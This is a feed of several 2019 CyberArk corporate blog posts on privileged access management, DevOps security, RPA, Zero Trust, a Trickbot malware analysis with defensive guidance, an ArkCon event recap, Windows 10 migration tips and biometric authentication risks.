  • A company’s CFO has the right to view information like W2s, company bookings and revenue projections, all information that can sway stock prices, cause employee tension and disrupt business.

Typically, these leaders are on-the-move, busy and crunched for time, all of which contributes to increased risk. Business leaders’ passwords are often repeated across platforms and not rotated nearly often enough because the process of creating new passwords for each application and account is too time consuming. They also typically don’t store passwords securely as they should, either because they don’t trust the platforms their organizations use or they aren’t as familiar with operating them as the IT side is. As a result, these passwords can often be found in places like spreadsheets, basic password managers and the ever-dreaded Post-It Note.

Using CyberArk best-of-breed privileged access management infrastructure and security capabilities as a backdrop, the latest version of the CyberArk solution can now securely store, show and copy passwords used by business leaders and other non-IT users accessing business websites and applications.

Protect non-IT users’ access to sensitive information contained on business websites and applications.

This release also introduces Privilege Management and Application Control Inbox workflows, which are now available for MacOS events within the CyberArk Endpoint Privilege Manager solution. This allows customers to collect, monitor and build policies on every launch and centrally manage permission requests from managed macOS machines.

Version 10.9 is available now. To learn more, click here!

]]>
Five Key Steps to Bring DevOps and Security Teams into Alignment https://www.cyberark.com/blog/five-key-steps-to-bring-devops-and-security-teams-into-alignment/ Tue, 21 May 2019 13:00:32 +0000 https://www.cyberark.com/?p=63157

Editor’s Note: Part 1 of a 5 Part series on securing DevOps environments based on insights from Global 1000 CISOs. This installment covers how to bring DevOps and security teams into alignment.

Securing DevOps environments is an increasingly important concern for Chief Information Security Officers (CISOs) and security teams. Earlier this year, we published The CISO View – Protecting Privileged Access in DevOps and Cloud Environments. The report established a series of recommendations based on insights gained from a diverse panel of expert CISOs from global 1000 organizations. Contributors to the report include executives from ING Bank, CIBC, Rockwell Automation, Lockheed Martin, Starbucks, Pearson, Asian Development Bank, American Express, NTT Communications, Carlson Wagonlit Travel, Orange Business Services, American Financial Group (AFG) and GIC Private Limited.

In this five-part blog series, we’ll expand guidance on each of the five recommendations highlighted in the CISO View report with the goal of helping security teams leverage these experiences and apply them to their own environments to improve DevOps security.

  1. Transform the security team into DevOps partners
  2. Prioritize securing DevOps tools and infrastructure
  3. Establish enterprise requirements for securing secrets and credentials
  4. Adapt processes for application testing
  5. Evaluate the results

Transform the Security Team into a DevOps Partner – Part one of the series will address how organizations can bring their DevOps and security teams into alignment and establish collaboration for stronger overall security.

While developers often recognize that security is important, it is not their top priority. More typically, the DevOps team prioritizes delivering new capabilities and features to the business and customers, often as part of a larger digital transformation initiative. And, developers often view security as something that will slow down deployments.

Security teams often have limited DevOps knowledge or expertise. Too often the result is that DevOps adoption begins and even takes hold inside an organization before the security team really gets involved. Consequently security vulnerabilities are not always adequately addressed in DevOps environments and can drive unnecessary risk.

As the CISO View report points out, it’s important for the security team to take the lead in integrating security into the DevOps processes before poor practices become entrenched.

So, how can security teams better engage, energize and collaborate with their DevOps counterparts to strike the right balance? The following five tips summarize the panel’s guidance for transforming security teams into DevOps partners:

  1. Establish the requisite skills to get in the driver’s seat. Effective collaboration requires effective communication. While developers write the actual code, it’s important for security teams to gain knowledge about programming languages along with how applications are built, tested and deployed automatically. This will help them have more meaningful discussions and credible conversations. Security professionals can start by learning some of the fundamentals: PowerShell, Python, and Rust, as well as how DevOps tools use REST calls and containerization technologies – particularly Docker and Kubernetes.
  2. Make it easy for developers to do the right thing. As one CISO View contributor noted, “You can’t be the manual cog in their completely automated process.” Make it easy for developers to do the right thing by training them in secure coding practices and implementing a self-service model for security capabilities. For example, you could provide security policy as code that can be integrated into the developers’ automated processes.
  3. Establish effective ways to collaborate. Set up formal systems to ensure DevOps practitioners understand security risks and implement good security practices across the organization. Consider how best to deploy security resources into existing or new organizational models and structures. The report outlines approaches to improving DevOps security, which include establishing centers of excellence, community leaders, security champions and embedding security team members inside development teams.
  4. Get developers to think like attackers. Educate DevOps teams on specific attacker tactics, show how sample code modules could expose secrets and provide examples as user stories. For example, “As an attacker, I would scan the organization’s code repositories looking for secrets.” Take the team through a penetration testing exercise or engage a Red Team to demonstrate how an attacker would compromise a CI/CD pipeline.
  5. Adopt Agile and DevOps methods. Security should begin utilizing Agile and DevOps methods within their own teams, not only to gain a deeper understanding of DevOps methodologies, but also to achieve greater efficiency by automating tasks or delivering capabilities in smaller increments more frequently.

The bottom line – understanding how other enterprises approach secrets management challenges across DevOps and cloud environments can help encourage collaboration and help fast-track the security team’s own efforts.

Next Steps – Check back soon, in the coming weeks, in part 2 we’ll be taking a closer look at how to prioritize securing DevOps tools and infrastructure.

You can also download The CISO View report in full, watch a two minute animated video that highlights the report’s top five recommendations or watch a related webinar.

 

 

]]>
The Business Case for Securing Robotic Process Automation https://www.cyberark.com/blog/the-business-case-for-securing-robotic-process-automation/ Thu, 16 May 2019 13:00:10 +0000 https://www.cyberark.com/?p=62831

As part of their ongoing digital transformation journeys, enterprises are turning to Robotic Process Automation (RPA) to enhance efficiency and productivity. According to Deloitte, 53 percent of organizations have started to leverage RPA to robotize and automate repetitive tasks to allow the human workforce to focus on higher value work, accelerate business value and increase process scalability. RPA adoption is expected to increase to 72 percent in the next two years and, if adoption continues at its current level, RPA will achieve near-universal adoption within the next five years.

Building the Business Case for RPA Privileged Access Management 

As organizations consider RPA, CISOs and security leaders have a timely opportunity to drive conversations with the business about the value of applying strong cybersecurity to this transformative technology, and related business outcomes. Here are three ways to build the business case for RPA security – centered on protecting privileged access:

  • Reduced risk = additional cost savings. Though current industry estimates on RPA cost savings vary – from 25 to 50 percent – the ROI is undeniable. The Deloitte study points to total ROI in less than 12 months, with significantly improved compliance, quality, accuracy, productivity and cost reduction. But to realize the full financial promise of RPA, security must be built in from the start. Monitoring and protecting the privileged pathway is the first and most critical step in securing RPA workflows. This prevents unauthorized users from gaining access to data processed by RPA software robots, and stops malicious insiders and external attackers from progressing their attack.
  • Greater operational efficiency. Approximately 10 to 20 percent of all human work hours are spent on repetitive computer tasks. RPA helps automate much of this manual “hand work” involved in daily business, such as entering data (like invoices and POs) from one application into another. Implementing privileged access management (PAM) for RPA not only drives down risk, but also extends automation to the management and rotation of software robot privileged credentials. This helps IT operations teams streamline processes and improve operational efficiency. By refocusing these teams on less laborious, more business-critical, intellectually stimulating tasks, organizations can motivate employees, reduce stress, spark interest and job satisfaction and reduce employee burnout and churn.
  • Simplified compliance: RPA minimizes human access to sensitive data, which can reduce risk and compliance issues. However, RPA requires a host of new non-human “robots” that need privileged access to connect to sensitive systems and information, opening the door to new compliance challenges. A strong, centralized privileged access management solution can dramatically simplify audit reporting by automating the enforcement of privileged access policies and providing complete visibility into “who,” “when,” “why” and “what” took place during privileged sessions.

The clear business benefits of a strong privileged access management program can be realized across numerous digital transformation initiatives – from RPA and cloud to DevOps. Effectively conveying the value of privileged access management in enhancing the business will help in gaining critical executive support and obtaining necessary budget and resources. From there, executive leadership can help rally employees to make it an organizational priority, impart a sense of urgency and ownership, and prevent it from being derailed.

Robotic Process Automation: Expanding the Cyber Attack Surface

Despite its many benefits, RPA can introduce significant new security risks and expand an organization’s overall attack surface. Consider that, in a typical enterprise RPA deployment, an organization may utilize thousands of software robots in production, which are activated and deactivated on-demand. These robots can perform a huge number of automated, functional tasks every hour – or even every minute. (For a deeper dive on this, check out our on-demand webinar “The Power and Potential of Robotic Process Automation.”) Each one of these software robots requires privileges to connect to target systems and applications to perform assigned duties. If these non-human credentials are left unsecured, they become ripe targets. Attackers can compromise these valuable credentials to move laterally and advance their attack. Given the number of bots deployed in production at any given moment, these unsecured credentials can expand the attack vector exponentially.

 All of this means that as organizations embrace RPA, security teams must manage and protect privileged credentials for these robots just as they would any other privileged user or process.

Robotic Process Automation Privileged Access Management in Action: CyberArk and UiPath

Today, CyberArk delivers more out-of-the-box integrations with top RPA solutions and secures more in-production deployments than any other privileged access management vendor. One such integration is with UiPath, which enables organizations to implement privileged access management controls directly into their RPA workflows and processes, and ultimately, deliver greater business value.

The integrated solution centrally stores and manages all Windows domain login credentials via UiPath’s Orchestrator (part of the UiPath Enterprise RPA Platform, which provides centralized scheduling, management and monitoring capabilities for all software robots) and all other non-Windows credentials directly through the CyberArk Privileged Access Security Solution. Software bots can securely retrieve the required credentials prior to performing automated tasks. For a full demo, check out this on-demand webinar.

Interested in learning more about how you can reap the full benefits of RPA solutions while reducing privilege-related risk?  Watch this two-minute CyberArk video and contact us today.

 

 

]]>
Passwords are Just One Piece of the Cybersecurity Puzzle https://www.cyberark.com/blog/passwords-are-just-one-piece-of-the-cybersecurity-puzzle/ Wed, 15 May 2019 19:26:53 +0000 https://www.cyberark.com/?p=98916

To achieve Zero Trust security, “never trust, always verify” must extend beyond users to their devices as well. In a previous post, I described the importance of the first step in Zero Trust — the verifying of every user who logs in.

Once you verified that people are who they say they are, then you must also consider the device from which they connect. Is it a known device that’s associated with the user? And more then, more importantly, is it in good security posture?

To ensure real safety, every device must be validated before granting access. To do that, we must first assess how users gain access through their devices today.

“What’s The Password?”

Today, nearly everyone locks their devices with some kind of password. That’s unequivocally a great thing, but it’s still important to keep in mind two universal truths about passwords: 1) they’re not all created equal, and 2) they’re just one piece of the cybersecurity puzzle.

In looking at the first, there’s tons of evidence supporting the idea that passwords are only as good as the user. I’ve said this before many times, but 81% of breaches involve weak and stolen passwords. So how does that happen?

recent study found that millions of people are using easy-to-guess passwords on sensitive accounts. From popular sports team to musicians — and classics like “123456” and “qwerty” and the all-time great “password” — users do a terrible job of choosing secure passwords.

Now, this doesn’t paint the full picture, and it’s not entirely their fault. When you add the context that the average business user today manages upwards of 200 passwords, it’s not so hard to believe there might be some cut corners somewhere.

So, if not all passwords are created equal, then what are the other pieces of the cybersecurity puzzle needed to keep users safe?

Beyond Passwords

The first step to more secure access is ensuring that users are logging into their device with more than simply a password. Devices need to also have some kind of adaptive multi-factor authentication (MFA) to go along with that password.

An additional layer of security can be applied when these MFA-supported passwords are coupled with some level of device and app management to confirm the right policies and lock them in place. It’s even possible for Next-Gen Access technology to score the “riskiness” of that device under certain conditions — such as where it’s used, what browser it has, etc. — to make a safe (and more informed) access decision.

It’s the combination of these things that allows us to know that the device is associated with an end-user, and it’s in a trustworthy state. However, we’re not done there. For all of the pieces of a Zero Trust model to come together, we must intelligently limit their access. Our next blog will tackle how to make sure users only have access to what they need.

 

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Trickbot Update: From Credential Theft to Business Disruption https://www.cyberark.com/blog/trickbot-update-from-credential-theft-to-business-disruption/ Tue, 14 May 2019 13:19:06 +0000 https://www.cyberark.com/?p=62734

Researchers recently discovered a new variant of the original Trickbot that turns the banking Trojan into a remote application credentials thief. Developed in 2016, the original TrickBot was one of the more recent banking Trojans, with many of its original features inspired by Dyreza (another banking Trojan), though Trickbot can also steal from Bitcoin wallets.

The original Trickbot’s main capabilities include harvesting emails and credentials using the Mimikatz tool. However, Trickbot’s authors show an extraordinary ability to constantly add new features and developments – and auto-update the infected machines with the new releases.

The newest variants of the malware should give the security-ops team something to watch out for. The previous Trickbot module included a password-grabbing module, but the latest variant takes application credentials theft a step further.

The new variant of Trickbot is somewhat similar to the previous version discovered in 2018. However, the updated version adds some new functionality – mainly in the remote desktop space. These new features include Virtual Network Computing (VNC), PuTTY and the a Remote Desktop Protocol (RDP) platform.  There is no doubt that the TrickBot authors are agile and creative and this is what makes this specific banking Trojan so dangerous.

Infection Vectors

TrickBot is typically spread via malicious spam (malspam) campaigns—for instance, spear phishing emails disguised as unpaid invoices or requests to update account information. Other methods of propagation include embedded URLs and infected attachments, such as Microsoft Word documents, and Excel files regarding tax returns with macros enabled. TrickBot is also seen as a secondary infection dropped by Emotet. And, with the help of those stolen NSA exploits that keep proving their worth, once it has infected a single endpoint, TrickBot can then spread laterally through the network using the SMB vulnerability (MS17-010), which includes either the EternalBlue, EternalRomance or EternalChampion exploit.

VNC:  To grab VNC credentials, the pwgrab module searches for files using the “*.vnc.lnk” affix, which is usually located in the following directories:

  • %APPDATA%\Microsoft\Windows\Recent
  • %USERPROFILE%\Documents, %USERPROFILE%\Downloads

The stolen information includes the target machine’s hostname, port and proxy settings.

PuTTY:  To retrieve the PuTTY credentials, Trickbot probes the registry key Software\SimonTatham\Putty\Sessions to identify the saved connection settings. This allows the module to retrieve information, such as the Hostname and Username, and Private Key Files used for authentication.

 RDP:  Trickbot’s third function uses the CredEnumerateA API to identify and steal stored credentials. It then parses the string “target=TERMSRV” to identify the hostname, username and password saved for each RDP credential.

Business Disruption

It is most likely that the endpoint user will not notice any symptoms of a TrickBot infection. However, a network admin will see changes in traffic or attempts to reach out to blacklisted IPs and domains, since the malware will communicate with TrickBot’s command and control infrastructure to exfiltrate data and receive tasks.

TrickBot gains persistence by creating a Scheduled Task. Moreover, due to the way it uses the SMB vulnerability to spread through a company’s network, any infected machine on the network will re-infect cleaned machines when they rejoin the network.

Therefore, IT teams need to isolate, patch and remediate each infected machine one-by-one. This can be a long and painful process and costly in terms of time and resources. Much like with ransomware attacks, the best protection against a threat like TrickBot is to proactively prevent infection in the first place.

Understand Your Attacker

Most attacks today follow a similar pattern, understanding this pattern is key to protecting sensitive data and systems from theft and compromise.  Regardless of where an attack originates –– skilled attackers will end up on the inside. (This applies beyond TrickBot)

Before they can steal any data, they have to learn the network, locate the data and gain the privileged access necessary to exfiltrate it.

Once inside the network, attackers first look for access to an internal account, preferably one with administrative privileges. They then leverage the compromised privileged account to escalate their privileges in order to gain access to more of the network and move through it more freely. With the necessary privileges, attackers next carry out reconnaissance on the network to determine how to best reach the target. With an attack plan in place, attackers move laterally to get into a better position and further escalate their privileges until they successfully reach the target system – or systems – and begin exfiltrating sensitive data.

The “Traditional” Way to Prevent Infection

As with anything else, there are standard methods for preventing infection by malware like Trickbot. These include:

  • Use antivirus programs on clients and servers and automatically update signatures and software.
  • Disable all macros, except those that are digitally signed.
  • Apply appropriate patches and updates immediately after testing.
  • Implement filters at the email gateway to filter out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall.
  • If you do not have a policy regarding suspicious emails, create one and specify that all suspicious emails should be reported to the security or IT departments.
  • Implement Domain-Based Message Authentication, Reporting and Conformance (DMARC), a validation system that minimizes spam emails by detecting email spoofing using Domain Name System (DNS) records and digital signatures.
  • Mark external emails with a banner denoting that it comes from an external source. This will assist users in detecting spoofed emails.
  • Provide social engineering and phishing training to employees. Urge them not to open suspicious emails, click on links contained in such emails, post sensitive information online and to never provide usernames, passwords or personal information to any unsolicited request.
  • Teach users to hover over a link with their mouse to verify the destination prior to clicking on the link.

Still Got Infected? What’s Next?

Anti-virus software and intrusion detection systems alone  can’t fully protect you from infection. This is what you need to do if it’s already too late and you’re infected:

  1. First, you need to spot the infected machine, which is not as easy as it sounds.
  2. Then, disconnect the infected machine from the network.
  3. Patch the machine for MS-17-10.
  4. Disable administrative shares. (The most recent Trickbot variants, after querying the share and getting a list of all connected machines, use C$ with Admin credentials to move around and re-infect all the other endpoints.)
  5. Find a tool, such as Malwarebytes, that can remove TrickBot.
  6. Change account credentials. Repeated re-infections are an indication that Trickbot was able to guess or brute force the administrator password successfully. Change all local and domain administrator passwords.

What a nightmare…

How to Protect Yourself the Right Way

Since anti-virus software can’t provide complete security, it’s important to have another layer of protection.  The principle of least privilege together with credential theft modules  can help by providing users with only the minimum level of access required to accomplish their tasks. Limit administrative credentials to designated administrators.

Solutions like the CyberArk Endpoint Privilege Manager can add another layer of protection by proactively preventing credential theft. Endpoint Privilege Manager can protect endpoint credential stores that reside in memory, registry or files and block malware from moving laterally to infect more and more of the system. While using this solution, even if malware bypasses the traditional security protections, critical resources remain protected.

Learn how CyberArk solutions can help block and contain threats at the endpoint. Download the Endpoint Privilege Manager Solution Brief or request a demo.

]]>
Bigger and Better: Welcome to the 2019 ArkCon Cybersecurity Event https://www.cyberark.com/blog/bigger-and-better-welcome-to-the-2019-arkcon-cybersecurity-event/ Fri, 10 May 2019 13:00:04 +0000 https://www.cyberark.com/?p=62511

Last week, CyberArk Labs hosted its second annual ArkCon cybersecurity event. ArkCon brings top cybersecurity researchers from around the world to Tel Aviv, Israel, where they meet to listen to presentations by experts in their fields and collaborate with peers in a dynamic, fun-filled environment. This year’s keynote speaker was pancake (with a lower case “p,”) who flew in from Spain to talk about his free and open source reverse engineering tool source, radare2. Four hundred people showed up for the cybersecurity event at the Ocean Tel Aviv event center.

Attendees meet and greet outside in the nice weather

 

One of the most exciting events at ArkCon was the awards ceremony. Prior to the event, CyberArk Labs released a series of challenges to the worldwide cybersecurity community. The awards ceremony celebrated the top two challenge solvers– Yakov Cohen and Lior Suliman. Cohen is a security researcher at Intel, while Suliman currently serves with the Israeli Defense Force. Doron Naim, CyberArk Labs’ Group Manager, ran the cybersecurity event. He explained, “The winners faced talented competition, but in the end they were faster than anyone else.”

ArkCon 2019 Cybersecurity Event
The main presentation stage at ArkCon 2019

 

Winning these challenges is a big deal, because the challenges, according to Naim, are harder than a standard “capture-the-flag,” a popular type of information security competition. Naim said, “The challenges were all very different from each other, since each of them was written by a different person with a different background. This means that in order for one person to solve all of the challenges, they needed expertise in the fields of each of the challenge creators.” According to Naim, knowledge and hands-on experience in reverse engineering, forensics, exploitation, containers, virtualization, the web, DevOps and the cloud were all needed to solve the challenges.

There were a lot of exciting moments at ArkCon, but, Naim said, “The ones that stood out to me the most were, of course, meeting the winners. It was great to meet the people who invested so much effort and their precious time in solving the challenges we created.”

ArkCon attendees work together on new projects

 

At ArkCon, attendees got a second chance to solve the challenges, this time working together with others they met at the cybersecurity event. Additional highlights included several informative speaker sessions, including the keynote by pancake, a session on container security – and how to break it – by CyberArk Lab’s Nimrod Stoler and a session from CheckPoint’s Eyal Itkin on his discovery of vulnerabilities related to RDP protocol. There was even a “fun area” with a raging bull ready to buck off brave attendees. Beyond that, attendees had opportunities to talk with each other, bond over their shared interest in cybersecurity and leave with new people to collaborate with for their next project.

Attendees relax in beanbag chairs, but keep their computers open

 

The biggest surprise all day, for Naim, came from the youngest attendees. “I was surprised by the passion of the younger participants for solving the challenges. They arrived 30 minutes before we opened the gates! They were extremely competitive too. We’re happy to see such high motivation in the next generation.”

As for ArkCon 2020, Naim says it will be even “bigger and better!” Though, he added, to expect even bigger and even better things from ArkCon 2021.

]]>
Keep Security in Mind for a Successful Windows 10 Upgrade: Five Steps https://www.cyberark.com/blog/keep-security-in-mind-for-a-successful-windows-10-upgrade-five-steps/ Wed, 08 May 2019 15:59:36 +0000 https://www.cyberark.com/?p=61754

Last month, Microsoft announced that Windows 10 is now installed on more than 800 million active devices around the globe. Windows 10 deployments continue to gain momentum as enterprises aim to take advantage of Windows 10’s security features, enhanced usability and operating speed, while also preparing for the end of Windows 7 support in January 2020. Security should be  key consideration in any enterprise migration. If you’re one of the many organizations planning a Windows 10 upgrade this year or recently purchased new hardware that has Windows 10 pre-installed and want to make sure you have a secure migration, here are five important things to keep in mind for your planning and deployment process:

  1. Backup EVERYTHING. Unlike other incremental Windows updates, a full Windows 10 install means you’ll have a totally new and improved system. This also means that you must backup all content, applications and files on each machine before starting your roll-out. Otherwise, you’ll risk the chance of data loss from potential crashes and data wipes during the Windows 10 install process. You should also have a backup plan in place in case the upgrade fails. Windows 10 allows users to create a recovery drive or system repair disk that can be used to troubleshoot issues and restore data during the installation. Think you’ve backed everything up? Check again, then proceed with caution.
  2. Check your disk space. Every Windows 10 update requires adequate hard drive storage space. You can free up space by running the machine’s disk cleanup files, uninstalling unwanted or unused programs, removing duplicate and temporary files and emptying the recycle bin. From there, you can decide whether to simply upgrade (which requires less disk space) or perform a complete install (which requires substantial disk space) based on available storage capacity.
  3. Don’t lose your product key. A product key is the 25-character code used to activate Windows 10. It looks like this: XXXXX-XXXXX-XXXXX-XXXXX-XXXXX. You’ll need this product key to activate Windows 10 and may need it again for re-installations and upgrades down the road. It’s important to know that Microsoft doesn’t keep a record of purchased product software keys, so once you have your product key, keep track of it!
  4. Make sure your applications are all compatible. While most off-the-shelf applications will work out-of-the-box on Windows 10, internally developed software and web applications may be incompatible with Windows 10 clients. Before moving to Windows 10, perform precise compatibility to testing to make sure you won’t lose the use of anything important.
  5. Remove admin rights from all workstations. To effectively reduce the attack surface and mitigate the risk of a serious data breach without impacting user productivity, it’s important to implement tools that enforce privileged access management (PAM) on the endpoint to block and contain attacks. As a first step, you should remove admin rights and enforce the principle of least privilege on desktops, laptops and servers as part of the Windows 10 migration process. Additionally, application control should be instituted to block malicious apps from running and to contain and analyze unknown apps. Finally, deploy anti-theft protection measures to help detect and block suspected credential theft attempts and contain would-be cyber attackers at the endpoint to reduce potential damage to the business.

To learn more about how CyberArk can help you secure privilege and improve endpoint management as part of your Windows 10 migration project, visit here or contact us today.

]]>
Imposter Syndrome: Why You Can’t Separate the ‘Good Guys’ from the ‘Bad Guys’ https://www.cyberark.com/blog/imposter-syndrome-why-you-cant-separate-the-good-guys-from-the-bad-guys/ Mon, 06 May 2019 19:20:38 +0000 https://www.cyberark.com/?p=98914

Last week, I shared some thoughts around how the former king of cybersecurity, the strong perimeter defense, had been dethroned. Adoption of the cloud and mobile has blown open too many holes in traditional firewalls, and resources (data, applications, infrastructure, devices) are becoming increasingly hybrid or even located outside of the perimeter entirely.

When it comes to identity and access, it’s becoming harder, if not impossible, to distinguish the “good guys” from the “bad guys.” So, how do we separate bad actors from good actors without introducing massive inconveniences to users?

The answer lies in a Zero Trust approach to security.

Zero Trust means “never trust, always verify.” While that might sound obvious for IT and security professionals, the nuance lies in reducing our faith in those perimeter systems alone to keep bad eggs out.

“Knock, Knock” – “Who’s There?”

Today, 10 times the number of breaches occur from identity attacks (such as stolen logins or passwords) as security vulnerabilities, unpatched servers, malware, and the like. While those additional layers of security do matter, organizations must address the vulnerabilities which accompany identity.

This comes into play with something like Single Sign-on.

Single Sign-on (SSO) has some great security benefits, such as access through one portal and cutting down on the overall number of logins and passwords that users need to remember. But what happens if that person loses their device or those credentials are compromised? There’s a security gap and malicious actors now have free rein inside your domain.

The obvious solution is to balance SSO with something like Multi-factor Authentication (MFA), which sends unique codes or tokens to users every time they attempt to login. But wait, now the experience is cumbersome for users who are doing the right thing 99 percent of the time. How can the need for both security and a better user experience be achieved?

Building Trust Through Context

Most people understand that just because a user is connected to the network, doesn’t mean that they’re trustworthy. However, by learning from users’ habits and routine, organizations can start to learn or build “trust” for them through their login context.

This is called behavior-based access, and it’s the hallmark of next-gen identity and access management.

With the right technology, companies can leverage artificial intelligence and machine learning to understand when a user deviates from their normal behavior – such as if they’re on a new device or traveling – and only then grant access once another token of authentication has been verified.

While trust takes on a slightly different meaning in cybersecurity, it also means something important to the end user. The need to balance security without hampering their experience is paramount today.

But verifying every user is just one component of the Zero Trust model. In our next blog for this series, we’ll cover how (and why) you must validate every device.

 

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Biometric Authentication – Our ‘Unique Human Identities’ Under Attack https://www.cyberark.com/blog/biometric-authentication-our-unique-human-identities-under-attack/ Tue, 30 Apr 2019 13:00:48 +0000 https://www.cyberark.com/?p=60806

Editor’s Note: In late 2018, CyberArk published five cybersecurity predictions for 2019. This deep-dive blog series will examine each prediction in detail to help organizations stay on top of emerging threats and out-innovate and out-maneuver cyber attackers.  One of the goals for this series is to provide updates on how these trends develop and progress over the course of the year. Today’s topic is biometric authentication.

The buzz around biometric authentication and its role in cybersecurity continues to build. Once reserved for sci-fi movies, biometric fingerprint readers, facial recognition systems, retinal scanners and more have, in recent years, proven effective in authenticating consumer devices. This has prompted many enterprise organizations to explore biometric authentication as a way to safeguard their sensitive data. Some information security pundits believe biometric technology is the future of digital security, while others voice mounting concerns around privacy. Before we weigh the risks and rewards, here’s a quick overview.

Breaking Down Biometric Authentication

To be useful for identification and access control purposes, biometric markers must be completely unique to an individual, permanent and recordable. Examples of biometric data include a person’s unique facial structure, the one-of-a-kind patterned iris encircling a pupil in the eye, the tiny ridges of a fingerprint, the unique sound waves of a person’s voice (or “voiceprint”), the geometry of a hand or the way a person interacts with a computer system (his/her typing cadence, mouse usage, keystrokes, etc.) These ‘unique human identities’ are collected, stored and matched in a database, providing a secure way for users to log into a host of devices or systems without having to use (and remember) multiple passwords.

A survey conducted by CyberArk among UK office workers released in late 2018 revealed that many organizations are beginning to integrate cutting-edge new security technologies into their strategies, with nearly one in five (19%) reporting that their IT security team is experimenting with biometric security techniques, including fingerprint and retinal scans and embedded microchips.

The Biometric Authentication Cybersecurity Conundrum

When it comes to biometric authentication, there are myriad security and privacy concerns.

First and foremost, because of the permanent nature of these identifiers, the stakes are much higher and the security and privacy risks are much greater. Since you cannot change your face, hand vein structure or fingerprints like you can change a traditional password, if someone steals and uses or duplicates your biometric identity, you can’t do much about it – leaving your devices and accounts vulnerable and exposed. Furthermore, the permanence of biometric authentication could easily lead some individuals and organizations to become overly confident in the technology and give up on cybersecurity best practices such as strong password policies and multi-factor authentication (MFA).

Cyber attackers understand all of this and have mounted a wave of attacks against these newly engineered biometric markers for digital and physical authentication.

Here are just a few ways attackers are targeting these identities to gather massive amounts of biometric data for future modeling purposes and nefarious use:

  • Embedded human microchips. According to the biohacking company Dangerous Things, between 50,000 and 100,000 people today sport an embedded microchip, which they use to do things like unlock their office door, get into the gym, buy lunch and simplify travel. Yet, a number of security researchers have demonstrated ways to successfully hack into these chip implants – from infecting a chip with a virus through an SQL injection attack to conducting a URL attack on a browser vulnerability on an NFC chip.
  • Genetic consumer services. If you’ve ever taken an at-home DNA test, your unique genetic information is now in the hands of an organization you probably know little to nothing about. Last June, genealogy testing service MyHeritage revealed that 92 million accounts were found on a private server. While personal DNA was not compromised in this instance, it illustrates the potential for far-reaching damage in the case of a successful breach.
  • Biometric stores within organizations. As adoption of biometric authentication soars, massive amounts of highly sensitive data are being collected, stored on-premises and in the cloud, processed and accessed with little protection or oversight. Cyber attackers are increasingly targeting data stores within organizations, understanding that many have not implemented the appropriate technical and organizational measures needed to keep this sensitive data secure.

Unfortunately, uncrackable biometric authentication technology is still very much science fiction. While the future of traditional passwords isn’t looking bright, there is still much work to be done on both the cybersecurity and privacy regulation fronts before organizations can adopt this futuristic authentication approach with confidence.

]]>
Like the Night King, Perimeter Defense is Dead https://www.cyberark.com/blog/like-the-night-king-perimeter-defense-is-dead/ Mon, 29 Apr 2019 19:13:58 +0000 https://www.cyberark.com/?p=98912

If you’ve been following the return of Game of Thrones (warning: show spoilers ahead) then you know winter has arrived.

Last season, on the back of some serious firepower in the form of an undead Dragon, the White Walkers finally breached the Great Wall and descended upon the seven kingdoms. The iconic scene and subsequent fallout this season reminds me, in many ways, of how the castle-and-moat strategy has also failed against the growing sophistication of today’s cybersecurity threats.

For so long, cybersecurity has been an industry driven by barriers. Perimeter defense was king, and so were the technologies that established walls, gates, and moats that kept evil forces at bay. But today, the number and scale of cyber attacks continue to grow. The Great (fire)Wall is no longer the end-all, be-all to stop threats and keep the kingdom safe. Here’s why…

Like a Wight Dragon, the Cloud has Blown Up the Perimeter

In the age of digital transformation, a growing number of business resources must now exist outside the traditional perimeter. As companies embrace more cloud services — and move everything from infrastructure, applications, and data to the cloud — they’re blowing more holes (or at least introducing more weak points) in their own firewalls. With so many new entry-points, even the strongest perimeter defense strategy today can’t alone keep the castle from being infiltrated.

While the majority of company leaders prioritize reinforcing their cybersecurity defenses against malware, bad guys continue to walk right through the front gates. Eighty-one percent of breaches today involve compromised credentials (weak or stolen passwords). These are essentially the “keys to the kingdom” since traditional castle-and-moat strategies were never meant to account for what happens once the walls have been breached. Once they’re inside, what’s in place to stop them from accessing even more services?

Information, the Secret Weapon Against the Dark

None of this even takes into account the growing sophistication of today’s cybersecurity threats. Like the Night King’s undead army, threats from malicious actors have grown in number and power. Whether it’s phishing, brute force attacks, or keystroke loggers, they don’t even need a fire-breathing zombie dragon to put a hole in your barriers and leave the business at risk of being overrun. So if perimeter defense is dead, what can be done to stop their march?

